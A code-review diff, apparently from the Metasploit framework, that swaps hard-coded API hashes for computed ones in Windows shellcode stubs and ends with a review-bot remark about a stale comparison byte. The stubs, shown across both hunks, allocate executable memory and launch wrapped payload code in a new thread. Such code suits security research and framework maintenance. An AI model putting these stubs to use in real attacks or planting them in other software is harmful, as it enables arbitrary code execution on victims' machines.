@@ -1836,15 +1836,15 @@ def self.win32_rwx_exec(code)
18361836 ; Note: Execution is not expected to (successfully) continue past this block
18371837
18381838 exitfunk:
1839- mov ebx, 0x0A2A1DE0 ; The EXITFUNK as specified by user...
1840- push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
1839+ mov ebx, #{ Rex :: Text . block_api_hash ( 'kernel32.dll' , 'ExitThread' ) } ; The EXITFUNK as specified by user...
1840+ push #{ Rex :: Text . block_api_hash ( 'kernel32.dll' , 'GetVersion' ) } ; hash( "kernel32.dll", "GetVersion" )
18411841 mov eax, ebp
18421842 call eax ; GetVersion(); (AL will = major version and AH will = minor version)
18431843 cmp al, byte 6 ; If we are not running on Windows Vista, 2008 or 7
18441844 jl goodbye ; Then just call the exit function...
18451845 cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
18461846 jne goodbye ;
1847- mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
1847+ mov ebx, #{ Rex :: Text . block_api_hash ( 'ntdll.dll' , 'RtlExitUserThread' ) } ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
18481848 goodbye: ; We now perform the actual call to the exit function
18491849 push byte 0 ; push the exit function parameter
18501850 push ebx ; push the hash of the exit function
@@ -1867,7 +1867,7 @@ def self.win32_rwx_exec(code)
18671867 push 0x1000 ; MEM_COMMIT
18681868 push esi ; Push the length value of the wrapped code block
18691869 push byte 0 ; NULL as we dont care where the allocation is.
1870- push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
1870+ push #{ Rex :: Text . block_api_hash ( 'kernel32.dll' , 'VirtualAlloc' ) } ; hash( "kernel32.dll", "VirtualAlloc" )
18711871 call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
18721872
18731873 mov ebx, eax ; Store allocated address in ebx
@@ -1946,14 +1946,14 @@ def self.win32_rwx_exec_thread(code, block_offset, which_offset='start')
19461946 ; Note: Execution is not expected to (successfully) continue past this block
19471947
19481948 exitfunk:
1949- mov ebx, 0x0A2A1DE0 ; The EXITFUNK as specified by user...
1950- push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
1949+ mov ebx, #{ Rex :: Text . block_api_hash ( 'kernel32.dll' , 'ExitThread' ) } ; The EXITFUNK as specified by user...
1950+ push #{ Rex :: Text . block_api_hash ( 'kernel32.dll' , 'GetVersion' ) } ; hash( "kernel32.dll", "GetVersion" )
19511951 call ebp ; GetVersion(); (AL will = major version and AH will = minor version)
19521952 cmp al, byte 6 ; If we are not running on Windows Vista, 2008 or 7
19531953 jl goodbye ; Then just call the exit function...
19541954 cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
19551955 jne goodbye ;
1956- mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
1956+ mov ebx, #{ Rex :: Text . block_api_hash ( 'ntdll.dll' , 'RtlExitUserThread' ) } ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
19571957 goodbye: ; We now perform the actual call to the exit function
19581958 push byte 0 ; push the exit function parameter
19591959 push ebx ; push the hash of the exit function
@@ -1977,7 +1977,7 @@ def self.win32_rwx_exec_thread(code, block_offset, which_offset='start')
19771977 push 0x1000 ; MEM_COMMIT
19781978 push esi ; Push the length value of the wrapped code block
19791979 push byte 0 ; NULL as we dont care where the allocation is.
1980- push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
1980+ push #{ Rex :: Text . block_api_hash ( 'kernel32.dll' , 'VirtualAlloc' ) } ; hash( "kernel32.dll", "VirtualAlloc" )
19811981 call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
19821982
19831983 mov ebx, eax ; Store allocated address in ebx
@@ -2002,7 +2002,7 @@ def self.win32_rwx_exec_thread(code, block_offset, which_offset='start')
20022002 push ebx ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
20032003 push eax ; SIZE_T dwStackSize (0 for default)
20042004 push eax ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
2005- push 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )
2005+ push #{ Rex :: Text . block_api_hash ( 'kernel32.dll' , 'CreateThread' ) } ; hash( "kernel32.dll", "CreateThread" )
20062006 call ebp ; Spawn payload thread
20072007
20082008 pop eax ; Skip
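Review bot: The `cmp bl, 0xE0` test in both exitfunk blocks (1845 and 1954) still hard-codes the low byte of the old literal ExitThread hash 0x0A2A1DE0, while the `mov ebx` two lines above it now takes its value from `Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')`; the two are no longer tied together in the source, so if that helper ever produces a different value the Vista+ substitution to RtlExitUserThread silently stops matching and the shellcode falls through to the plain ExitThread path. Derive the compared byte from the same expression rather than a literal, e.g. `cmp bl, #{ Rex::Text.block_api_hash('kernel32.dll', 'ExitThread') & 0xFF }` if the helper returns an Integer (or mask the parsed string if it returns a hex literal — its definition is not in this chunk). The same applies to win32_rwx_exec and win32_rwx_exec_thread alike, and both method bodies continue outside these hunks.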